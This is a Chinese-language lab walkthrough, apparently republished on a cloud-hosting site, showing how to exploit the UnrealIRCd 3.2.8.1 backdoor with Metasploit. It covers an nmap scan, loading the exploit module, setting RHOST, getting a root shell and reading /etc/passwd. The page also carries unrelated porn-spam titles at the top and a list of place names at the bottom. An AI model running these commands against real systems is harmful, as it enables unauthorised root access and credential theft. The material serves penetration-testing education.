亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Metasploit溢出UnrealIRCd后門漏洞

發布時間:2020-10-06 06:02:39 來源:網絡 閱讀:1793 作者:白帽生活 欄目:安全技術

Metasploit溢出UnrealIRCd后門漏洞


利用UnrealIRCd后門漏洞,獲取目標主機的root權限。


某些站點的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的惡意代碼,遠程***者能夠執行任意代碼。



一、利用nmap工具掃描目標主機

1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。


1.2在終端中輸入命令“nmap –sV  192.168.1.3”,對目標主機進行端口掃描,發現開放6667端口,對應的服務為unreal ircd。

Metasploit溢出UnrealIRCd后門漏洞


1.3在終端中輸入命令“msfconsole”,啟動MSF終端。

Metasploit溢出UnrealIRCd后門漏洞



1.4在終端中輸入命令“search unreal ircd”,搜索ircd的相關工具和***載荷。

Metasploit溢出UnrealIRCd后門漏洞


1.5在終端中輸入命令“use exploit/unix/irc/unreal_ircd_3281_backdoor”,啟用漏洞利用模塊, 提示符就會提示進入到該路徑下。

Metasploit溢出UnrealIRCd后門漏洞


1.6在終端中輸入命令“show options”,查看需要設置的相關項,“yes”表示必須填寫的參數。

1.7在終端中輸入命令“set RHOST 192.168.1.3”,設置目標主機的IP地址。

Metasploit溢出UnrealIRCd后門漏洞



Metasploit溢出UnrealIRCd后門漏洞


1.8在終端中輸入“exploit”, 開始向目標主機***,***成功后,建立shell會話。


1.9在終端中輸入“whoami”,查看獲得的權限為root,輸入命令“cat /etc/passwd”,查看系統的帳號和密碼。

Metasploit溢出UnrealIRCd后門漏洞

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

富民县| 廊坊市| 如皋市| 韶关市| 清流县| 新乐市| 岑溪市| 公主岭市| 昭觉县| 晋江市| 习水县| 丰镇市| 鹤壁市| 六盘水市| 临漳县| 衡南县| 桂东县| 蒲江县| 丰顺县| 遵义市| 鱼台县| 邢台市| 布尔津县| 延吉市| 阳山县| 海阳市| 宁波市| 阿拉善盟| 突泉县| 柯坪县| 永城市| 临海市| 永登县| 井研县| 山西省| 榆林市| 黑水县| 宿迁市| 梓潼县| 肥东县| 靖宇县|